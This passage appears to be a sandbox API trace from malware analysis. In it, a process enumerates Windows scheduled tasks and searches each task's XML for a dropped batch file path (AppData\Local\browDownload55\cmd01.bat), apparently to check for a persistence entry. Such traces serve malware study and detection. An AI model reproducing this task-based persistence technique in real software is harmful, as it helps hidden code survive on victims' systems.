true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n P7D\r\n P2M\r\n \r\n \r\n \r\n \r\n \r\n {8168E74A-B39F-46D8-ADCD-7BED477B80A3}\r\n \r\n \r\n \r\n") returned 0x0 [0163.637] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-601)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-600)\r\n $(@%SystemRoot%\\system32\\MemoryDiagnostic.dll,-602)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\RunFullMemoryDiagnostic\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n P7D\r\n P2M\r\n \r\n \r\n \r\n \r\n \r\n {8168E74A-B39F-46D8-ADCD-7BED477B80A3}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.637] IUnknown:Release (This=0x929720) returned 0x0 [0163.638] IUnknown:Release (This=0x929590) returned 0x0 [0163.638] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.640] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.641] IUnknown:Release (This=0x929590) returned 0x0 [0163.641] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.641] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.641] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295b0) returned 0x0 [0163.644] IRegisteredTaskCollection:get_Count (in: This=0x9295b0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.644] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.644] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="MNO Metadata Parser") returned 0x0 [0163.644] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1901)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1902)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1903)\r\n \\Microsoft\\Windows\\Mobile Broadband Accounts\\MNO Metadata Parser\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT3M\r\n Queue\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n <Query Id='1'>\r\n <Select Path='Microsoft-Windows-DeviceSetupManager/Operational'>*[System/EventID=302] and *[EventData/Data[@Name='Prop_ServiceInfoNamespace']='http://schemas.microsoft.com/windows/2010/12/DeviceMetadata/MobileBroadBandInfo']</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\MbaeParserTask.exe\r\n \r\n \r\n") returned 0x0 [0163.646] StrStrIW (lpFirst="\r\n\r\n \r\n 1.3\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1901)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1902)\r\n $(@%SystemRoot%\\system32\\MbaeParserTask.exe,-1903)\r\n \\Microsoft\\Windows\\Mobile Broadband Accounts\\MNO Metadata Parser\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT3M\r\n Queue\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n <Query Id='1'>\r\n <Select Path='Microsoft-Windows-DeviceSetupManager/Operational'>*[System/EventID=302] and *[EventData/Data[@Name='Prop_ServiceInfoNamespace']='http://schemas.microsoft.com/windows/2010/12/DeviceMetadata/MobileBroadBandInfo']</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\MbaeParserTask.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.646] IUnknown:Release (This=0x929750) returned 0x0 [0163.646] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.646] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295b0) returned 0x0 [0163.649] ITaskFolderCollection:get_Count (in: This=0x9295b0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.649] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.649] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.649] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.649] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.652] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.652] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.652] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="LPRemove") returned 0x0 [0163.652] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n \\Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT9H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P4D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n") returned 0x0 [0163.654] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n \\Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT9H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P4D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.654] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.654] IUnknown:Release (This=0x929580) returned 0x0 [0163.654] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.657] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.657] IUnknown:Release (This=0x929580) returned 0x0 [0163.657] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.657] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.657] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.660] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.661] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.661] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="SystemSoundsService") returned 0x0 [0163.661] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n \\Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n") returned 0x0 [0163.664] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n \\Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.665] IUnknown:Release (This=0x929710) returned 0x0 [0163.665] IUnknown:Release (This=0x929590) returned 0x0 [0163.665] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.667] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.667] IUnknown:Release (This=0x929590) returned 0x0 [0163.667] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.667] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x27, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.668] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.671] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.671] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.671] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="GatherNetworkInfo") returned 0x0 [0163.671] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n") returned 0x0 [0163.675] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.675] IUnknown:Release (This=0x929700) returned 0x0 [0163.675] IUnknown:Release (This=0x929580) returned 0x0 [0163.675] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.678] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.678] IUnknown:Release (This=0x929580) returned 0x0 [0163.678] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.678] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.678] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.681] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.681] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.681] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="WiFiTask") returned 0x0 [0163.681] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)(A;;FA;;;S-1-5-80-3141615172-2057878085-1754447212-2405740020-3916490453)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-1)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-2)\r\n \\Microsoft\\Windows\\NlaSvc\\WiFiTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n true\r\n Queue\r\n 6\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA323028741\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\WiFiTask.exe\r\n nla\r\n \r\n \r\n") returned 0x0 [0163.683] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)(A;;FA;;;S-1-5-80-3141615172-2057878085-1754447212-2405740020-3916490453)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-1)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-2)\r\n \\Microsoft\\Windows\\NlaSvc\\WiFiTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n true\r\n Queue\r\n 6\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA323028741\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\WiFiTask.exe\r\n nla\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.683] IUnknown:Release (This=0x929700) returned 0x0 [0163.683] IUnknown:Release (This=0x929580) returned 0x0 [0163.684] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.690] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.690] IUnknown:Release (This=0x929580) returned 0x0 [0163.690] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.691] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.691] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.694] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.694] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.695] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Background Synchronization") returned 0x0 [0163.695] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P1D\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n PT2H\r\n \r\n PT20M\r\n \r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n") returned 0x0 [0163.697] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P1D\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n PT2H\r\n \r\n PT20M\r\n \r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.697] IUnknown:Release (This=0x929720) returned 0x0 [0163.697] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.697] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Logon Synchronization") returned 0x0 [0163.697] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n P1D\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT4M\r\n \r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n") returned 0x0 [0163.699] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n P1D\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT4M\r\n \r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.700] IUnknown:Release (This=0x929720) returned 0x0 [0163.700] IUnknown:Release (This=0x929590) returned 0x0 [0163.700] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.703] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.703] IUnknown:Release (This=0x929590) returned 0x0 [0163.703] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.703] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2a, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.703] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.706] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.706] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.706] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="Secure-Boot-Update") returned 0x0 [0163.706] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2012-02-07T16:39:20\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-604)\r\n \\Microsoft\\Windows\\PI\\Secure-Boot-Update\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E0C9541\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n") returned 0x0 [0163.709] StrStrIW (lpFirst="\r\n\r\n \r\n 2012-02-07T16:39:20\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-604)\r\n \\Microsoft\\Windows\\PI\\Secure-Boot-Update\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E0C9541\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.709] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.709] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.710] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="Sqm-Tasks") returned 0x0 [0163.710] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2011-07-22T00:00:00.8844064\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-603)\r\n \\Microsoft\\Windows\\PI\\Sqm-Tasks\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n") returned 0x0 [0163.712] StrStrIW (lpFirst="\r\n\r\n \r\n 2011-07-22T00:00:00.8844064\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-603)\r\n \\Microsoft\\Windows\\PI\\Sqm-Tasks\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.712] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.712] IUnknown:Release (This=0x929580) returned 0x0 [0163.712] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.715] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.715] IUnknown:Release (This=0x929580) returned 0x0 [0163.715] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.715] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2b, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.715] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.718] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0163.718] IUnknown:Release (This=0x929580) returned 0x0 [0163.718] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.721] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=1) returned 0x0 [0163.721] ITaskFolderCollection:get_Item (in: This=0x929580, index=0xce080*(varType=0x3, wReserved1=0x0, 